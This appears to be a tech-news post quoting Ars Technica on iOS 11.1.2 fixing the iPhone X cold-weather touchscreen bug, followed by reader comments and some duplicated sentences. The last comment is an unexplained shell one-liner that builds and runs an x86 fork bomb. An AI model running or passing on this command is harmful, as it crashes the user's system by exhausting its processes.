Apple Fixes the iPhone X 'Unresponsive When It's Cold' Bug (arstechnica.com)
An anonymous reader quotes Ars Technica:
Apple released iOS 11.1.2 for iPhones and iPads Thursday afternoon. It's a minor, bug-fix update that benefits iPhone X users who encountered issues after acquiring the new phone just under two weeks ago... The update fixes just two problems. The first is "an issue where the iPhone X screen becomes temporarily unresponsive to touch after a rapid temperature drop." Last week, some iPhone X owners began reporting on Reddit and elsewhere that their touchscreens became temporarily unresponsive when going outside into the cold... The update also "addresses an issue that could cause distortion in Live Photos and videos captured with iPhone X."
The article notes that the previous update "fixed a strange and widely mocked autocorrect bug that turned the letter 'i' into strange characters."
"To date, iOS 11's updates have largely been bug fixes."
The article notes that the previous update "fixed a strange and widely mocked autocorrect bug that turned the letter 'i' into strange characters."
"To date, iOS 11's updates have largely been bug fixes."
With gene doubling you could have a dog sized roach. You wouldn't need to buy food. It would feed itself from birds and small mammals.
I'd have achieved it if it weren't for those FOOLS AND LUDDITES at the University Ethics Board forcing me out of my lab and making me work in primitive conditions down in the sewers.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;